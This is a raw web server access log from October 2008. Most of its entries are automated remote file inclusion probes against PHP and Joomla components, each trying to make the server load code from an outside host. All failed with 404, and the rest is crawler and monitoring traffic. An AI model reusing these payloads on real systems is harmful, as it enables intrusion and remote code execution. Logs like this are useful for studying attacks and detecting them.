211.160.79.6 - - [03/Oct/2008:00:00:21 -0400] "GET /scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
74.52.139.226 - - [03/Oct/2008:00:03:29 -0400] "GET /logs/access_log.Q108091900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:03:29 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:03:33 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:03:54 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
66.172.9.3 - - [03/Oct/2008:00:04:59 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:00:04:59 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:00:04:59 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:00:04:59 -0400] "GET /logs/access_log.Q108072300//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
218.38.34.152 - - [03/Oct/2008:00:05:49 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:00:05:49 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:00:05:49 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:00:05:49 -0400] "GET /logs/access_log.Q108072300//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:06:07 -0400] "GET /view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:06:07 -0400] "GET /logs/error_log.Q108070800%20/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:06:11 -0400] "GET /logs/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:06:20 -0400] "GET /logs/error_log.Q108071600/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:06:20 -0400] "GET /logs/access_log.Q108070800/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
74.52.139.226 - - [03/Oct/2008:00:06:54 -0400] "GET /logs/error_log.Q108090500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 273 "-" "libwww-perl/5.810"
74.52.139.226 - - [03/Oct/2008:00:06:54 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
66.249.67.114 - - [03/Oct/2008:00:06:54 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
74.52.139.226 - - [03/Oct/2008:00:06:54 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
66.249.67.114 - - [03/Oct/2008:00:06:54 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
74.52.139.226 - - [03/Oct/2008:00:07:34 -0400] "GET /logs/access_log.Q108090500//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
74.53.127.68 - - [03/Oct/2008:00:07:41 -0400] "GET /logs/access_log.Q108060700/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:07:41 -0400] "GET /errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:00:07:41 -0400] "GET /logs/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.22.110.198 - - [03/Oct/2008:00:07:46 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/psybnc.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.22.110.198 - - [03/Oct/2008:00:07:46 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/psybnc.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.127.68 - - [03/Oct/2008:00:07:54 -0400] "GET /logs/error_log.Q108082800/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
209.59.12.99 - - [03/Oct/2008:00:07:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.9.3.130 - - [03/Oct/2008:00:07:59 -0400] "GET /logs/access_log.Q108061800/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
85.124.248.147 - - [03/Oct/2008:00:08:06 -0400] "GET /view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:00:08:06 -0400] "GET /logs/error_log.Q108071600/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:00:08:06 -0400] "GET /logs/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:00:08:07 -0400] "GET /logs/access_log.Q108070800/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
218.38.34.152 - - [03/Oct/2008:00:08:54 -0400] "GET /logs/access_log.Q108081600%20//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
74.6.17.176 - - [03/Oct/2008:00:08:38 -0400] "GET /logs/access_log.Q108051700 HTTP/1.0" 200 862320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
151.11.24.250 - - [03/Oct/2008:00:08:56 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
151.11.24.250 - - [03/Oct/2008:00:08:56 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
151.11.24.250 - - [03/Oct/2008:00:08:57 -0400] "GET /logs/access_log.Q108081600%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
85.124.248.147 - - [03/Oct/2008:00:09:10 -0400] "GET /logs/error_log.Q108070800%20/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
75.125.146.130 - - [03/Oct/2008:00:09:17 -0400] "GET /logs/access_log.Q108060700/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:09:17 -0400] "GET /errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:00:09:18 -0400] "GET /logs/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
151.11.24.250 - - [03/Oct/2008:00:09:27 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
151.11.24.250 - - [03/Oct/2008:00:09:27 -0400] "GET /logs/access_log.Q108072300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
75.125.146.130 - - [03/Oct/2008:00:09:39 -0400] "GET /logs/error_log.Q108082800/errors.php?error=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.124.248.147 - - [03/Oct/2008:00:09:50 -0400] "GET /logs/access_log.Q108061800/view.inc.php?phpAds_path=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
218.38.34.152 - - [03/Oct/2008:00:09:57 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
91.205.124.4 - - [03/Oct/2008:00:10:09 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
24.97.13.141 - - [03/Oct/2008:00:10:18 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
24.97.13.141 - - [03/Oct/2008:00:10:21 -0400] "GET /logs/errors.php?error=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
24.97.13.141 - - [03/Oct/2008:00:10:32 -0400] "GET /errors.php?error=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
74.52.139.226 - - [03/Oct/2008:00:11:21 -0400] "GET /logs/access_log.Q108091400%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
151.11.24.250 - - [03/Oct/2008:00:11:37 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ballettschule-tulln.at/htaccess/osid6.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:06 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:06 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:08 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:10 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:10 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:10 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
66.172.9.3 - - [03/Oct/2008:00:12:12 -0400] "GET /logs/access_log.Q108081600%20//admin/classes/TplLoad.php?full_path_to_public_program=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
76.9.3.130 - - [03/Oct/2008:00:12:13 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 289 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:13 -0400] "GET /logs/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:13 -0400] "GET /scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:25 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:25 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:25 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:25 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:32 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:32 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:38 -0400] "GET /logs/access_log.Q108081400/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:38 -0400] "GET /logs/access_log.Q108082500/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:39 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:12:39 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
62.141.48.47 - - [03/Oct/2008:00:12:43 -0400] "GET /logs/access_log.Q108081600%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
62.141.48.47 - - [03/Oct/2008:00:12:43 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
62.141.48.47 - - [03/Oct/2008:00:12:44 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:00:12:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.141.48.47 - - [03/Oct/2008:00:13:21 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
62.141.48.47 - - [03/Oct/2008:00:13:21 -0400] "GET /logs/access_log.Q108072300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
211.160.79.6 - - [03/Oct/2008:00:13:28 -0400] "GET /scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
211.160.79.6 - - [03/Oct/2008:00:13:29 -0400] "GET /logs/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
211.160.79.6 - - [03/Oct/2008:00:13:32 -0400] "GET /logs/access_log.Q108081400/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
211.160.79.6 - - [03/Oct/2008:00:13:42 -0400] "GET /logs/access_log.Q108082500/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:13:43 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:04 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:04 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:04 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:05 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:09 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:09 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:09 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:10 -0400] "GET /logs/access_log.Q108081400/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:10 -0400] "GET /logs/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:10 -0400] "GET /scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:10 -0400] "GET /logs/access_log.Q108082500/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:12 -0400] "GET /logs/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:12 -0400] "GET /logs/access_log.Q108081400/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:12 -0400] "GET /scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:13 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:14:14 -0400] "GET /logs/access_log.Q108082500/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
195.19.6.245 - - [03/Oct/2008:00:15:02 -0400] "GET /senetman/html/index.php?page=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.69"
195.19.6.245 - - [03/Oct/2008:00:15:04 -0400] "GET /logs/error_log.Q108061400/senetman/html/index.php?page=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.69"
195.19.6.245 - - [03/Oct/2008:00:15:05 -0400] "GET /senetman/html/index.php?page=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.69"
195.19.6.245 - - [03/Oct/2008:00:15:05 -0400] "GET /logs/senetman/html/index.php?page=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.69"
76.9.3.130 - - [03/Oct/2008:00:15:29 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 289 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:15:30 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
195.19.6.245 - - [03/Oct/2008:00:15:34 -0400] "GET /logs/error_log.Q108070100/senetman/html/index.php?page=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.69"
76.9.3.130 - - [03/Oct/2008:00:15:38 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:00:15:43 -0400] "GET /logs/access_log.Q108081400%20/scanhttp://xraver.de/include/images/smiles/id-as.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
221.128.124.166 - - [03/Oct/2008:00:15:54 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
221.128.124.166 - - [03/Oct/2008:00:15:55 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
221.128.124.166 - - [03/Oct/2008:00:15:56 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
221.128.124.166 - - [03/Oct/2008:00:16:09 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
219.85.63.226 - - [03/Oct/2008:00:17:09 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=Don't%20Pacth? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
219.85.63.226 - - [03/Oct/2008:00:17:09 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=Don't%20Pacth? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.59.12.99 - - [03/Oct/2008:00:17:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.128.124.166 - - [03/Oct/2008:00:20:30 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
221.128.124.166 - - [03/Oct/2008:00:20:31 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
221.128.124.166 - - [03/Oct/2008:00:20:32 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.6.17.176 - - [03/Oct/2008:00:19:51 -0400] "GET /logs/access_log.Q108081700 HTTP/1.0" 200 2127707 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.236.230.126 - - [03/Oct/2008:00:20:46 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 142932 "http://mailcenter3.comcast.net/wmc/v/wm/48E59DDE0008DF570000688B22120592140E0B01079C9D0B?cmd=Show&no=28&uid=2714&sid=c0" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2"
221.128.124.166 - - [03/Oct/2008:00:20:53 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
209.59.12.99 - - [03/Oct/2008:00:22:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.244.233.121 - - [03/Oct/2008:00:24:48 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
66.244.233.121 - - [03/Oct/2008:00:24:49 -0400] "GET /logs/access_log.Q108082900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
66.244.233.121 - - [03/Oct/2008:00:24:49 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
